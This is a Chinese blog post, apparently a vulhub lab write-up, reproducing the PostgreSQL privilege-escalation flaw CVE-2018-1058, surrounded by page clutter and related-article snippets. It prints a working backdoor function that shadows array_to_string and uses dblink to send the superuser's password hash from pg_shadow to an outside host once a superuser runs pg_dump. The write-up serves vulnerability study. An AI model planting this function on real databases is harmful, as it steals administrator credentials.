PostgreSQL 提权漏洞 CVE-2018-1058 漏洞复现

最新推荐文章于 2023-05-17 11:11:57 发布
最新推荐文章于 2023-05-17 11:11:57 发布
阅读量625 收藏 1
点赞数
分类专栏: vulhub_Writeup 文章标签: 安全漏洞 网络安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43416469/article/details/114493523
版权

PostgreSQL 提权漏洞(CVE-2018-1058)

by ADummy

0x00利用路线

​ 普通用户连接到数据库—>注入危险代码—>等待超级用户登录触发后门—>收到敏感信息

0x01漏洞介绍

​ PostgreSQL 是一款关系型数据库。其9.3到10版本中存在一个逻辑错误,导致超级用户在不知情的情况下触发普通用户创建的恶意代码,导致执行一些不可预期的操作。

影响版本

PostgreSQL < 10

0x02漏洞复现

我们先通过普通用户vulhub:vulhub的身份登录postgres: psql --host your-ip --username vulhub

执行如下语句后退出:

CREATE FUNCTION public.array_to_string(anyarray,text) RETURNS TEXT AS $$
    select dblink_connect((select 'hostaddr=192.168.0.141 port=8888 user=postgres password=chybeta sslmode=disable dbname='||(SELECT passwd FROM pg_shadow WHERE usename='postgres'))); 
    SELECT pg_catalog.array_to_string($1,$2);
$$ LANGUAGE SQL VOLATILE;

在这里插入图片描述

然后我在192.168.0.141上监听5433端口,等待超级用户触发我们留下的这个“后门”,用超级用户的身份执行pg_dump命令:docker-compose exec postgres pg_dump -U postgres -f evil.bak vulhub,导出vulhub这个数据库的内容。执行上述命令的同时,“后门”已被触发192.168.0.141机器上已收到敏感信息:

在这里插入图片描述

dUjPpD-1615114620219)]

ADummy_
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
【权限提升】61 Redis Postgresql数据库提权
(∪.∪ )...zzz的博客
08-04 430
目录redis数据库权限提升Redis未授权访问漏洞利用1. 利用计划任务执行命令反弹shell2. 写ssh-keygen公钥后 使用私钥登录3. 往web路径写webshell修复方案-漏洞成因PostgreSQL数据库提权建立连接、漏洞利用,提权Windows2008& 7 令牌窃取提升-本地Windows2003& 10 进程注入 redis数据库权限提升 redis非关系式,分布式 redis服务因配置不当,可被攻击者恶意利用 黑客借助redis内置命令,可将现有数据恶意清空
PostgreSQL 提权漏洞CVE-2018-1058
锋刃科技的博客
06-23 1427
前言 PostgreSQL 是一款关系型数据库。其9.3到10版本中存在一个逻辑错误,导致超级用户在不知情的情况下触发普通用户创建的恶意代码,导致执行一些不可预期的操作。 漏洞环境 启动存在漏洞的环境: docker-compose up -d 环境启动后,将在本地开启PG默认的5432端口。 参考上述链接中的第二种利用方式,我们先通过普通用户vulhub:vulhub的身份登录postgres: psql --host your-ip --username vulhub 执行如下语句后退
CVE-2018-1058 PostgreSQL 提权漏洞
weixin_51387754的博客
12-10 800
漏洞原理 PostgreSQL 是一款关系型数据库。其9.3到10版本中存在一个逻辑错误,导致超级用户在不知情的情况下触发普通用户创建的恶意代码,导致执行一些不可预期的操作。 ​ 普通用户连接到数据库—>注入危险代码—>等待超级用户登录触发后门—>收到敏感信息 影响版本:PostgreSQL < 10 漏洞复现 环境准备 打开漏洞存放路径:cd /home/guiltyfet/vulhub/postgres/CVE-2018-1058 docker-compose up -d
PostgreSQL 提权漏洞复现(CVE-2018-1058)
又菜又爱倒腾的博客
10-29 2561
#PostgreSQL 提权漏洞(CVE-2018-1058)# 一、漏洞简介 PostgreSQL 是一款关系型数据库。其9.3到10版本中存在一个逻辑错误,导致超级用户在不知情的情况下触发普通用户创建的恶意代码,导致执行一些不可预期的操作。 二、漏洞影响 影响版本 9.3到10 三、产生原因 PostgreSQL7.3版本之后,默认情况下,当一个用户创建一个数据库时,PostgreSQL会创建一个叫做public的模式。默认情况下,所有的对象都会被创建到这个模式下。所以SELECT * FROM a;
CVE-2018-1058简介
HighGO
04-04 1320
CVE-2018-1058描述了一个用户在不同模式下创建的一些名字很像的对象,是怎么改变其他用户的查询行为而且导致意料之外或者有害的行为的。它主要描述了这个问题以及在PostgreSQL中减轻这些问题的影响的办法。 什么是CVE-2018-1058PostgreSQL7.3版本之后,默认情况下,当一个用户创建一个数据库时,PostgreSQL会创建一个叫做public的模式。默认情况下,所...
PostgreSQLpostgresql-13.5-1-windows-x64.exe)
11-20
PostgreSQLpostgresql-13.5-1-windows-x64.exe)适用于Windows x86-64 PostgreSQL是一种特性非常齐全的自由软件的对象-关系型数据库管理系统(ORDBMS),是以加州大学计算机系开发的POSTGRES,4.2版本为基础的...
postgresql-12.4-1-windows-x64.exe
09-10
postgresql-12.4-1-windows-x64.exe
PostgreSQLpostgresql-13.5-1-osx.dmg)
11-20
PostgreSQLpostgresql-13.5-1-osx.dmg)适用于Mac OS X PostgreSQL是一种特性非常齐全的自由软件的对象-关系型数据库管理系统(ORDBMS),是以加州大学计算机系开发的POSTGRES,4.2版本为基础的对象关系型数据库...
postgresql-14.1-1-windows-x64
12-05
The PostgreSQL Project thanks Jacob Champion for reporting this problem. (CVE-2021-23214) Make libpq reject extraneous data after an SSL or GSS encryption handshake (Tom Lane) A man-in-the-middle ...
Beginning PostgreSQL on the Cloud--2018
03-20
Migrate PostgreSQL to the cloud Choose the best configuration and specifications of cloud instances Set up a backup strategy that enables point-in-time recovery Use connection pooling and load ...
web漏洞挖掘快速入门1
08-08
3. 通过 zmpap 全网爆破查询真实 ip(可靠) 4. 子域名爆破,现在越来越不靠谱了 5. 通过扫描出网站测试文件如 phpinfo,test 等配置文
PostgreSQL 远程代码执行漏洞分析及利用—【CVE-2018-1058
3569
03-07 2799
https://xianzhi.aliyun.com/forum/topic/2109漏洞描述A flaw was found in the way Postgresql allowed a user to modify the behavior of a query for other users. An attacker with a user account could use this f...
PostgreSQL CVE-2018-1058 问题?
将臣三代的博客
05-05 470
简 介 在之前的版本中,PgSql 在不同表空间下新建名称相似的对象时,会对其他用户查询该对象时造成不可预知的错误就想特洛伊木马病毒似的。 什么是 CVE-2018-1058? 在PgSql 7.3版本中介绍了”schemas”,在不同的命名空间允许用户创建对象或者函数等。 Catalog 和 Schema :可理解为一个容器或者数据库对象命名空间,解决命名冲突问题* 1个数据库----...
CVE-2018-1058(远程代码执行漏洞)vulhub复现
qq_52279315的博客
05-17 213
vulhub靶场复现postgresql
redies&postgres数据库提权&第三方软件或服务提权
m0_62207170的博客
03-19 405
redies&postgres数据库提权&第三方软件或服务提权
PostgreSQL 数据库提权的几种方法——提权教程
W小哥
12-02 2891
一、漏洞描述 二、漏洞原理 三、环境搭建 四、漏洞复现 五、漏洞修复
藏经阁-PostgresChina2018_刘东明_PostgreSQL并行查询.pdf
最新发布
09-09
"藏经阁-PostgresChina2018_刘东明_PostgreSQL并行查询.pdf" 在2018年的PostgreSQL中国技术大会上,刘东明分享了关于PostgreSQL数据库系统的并行查询功能。PostgreSQL是一个强大的开源关系型数据库系统,其并行查询...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值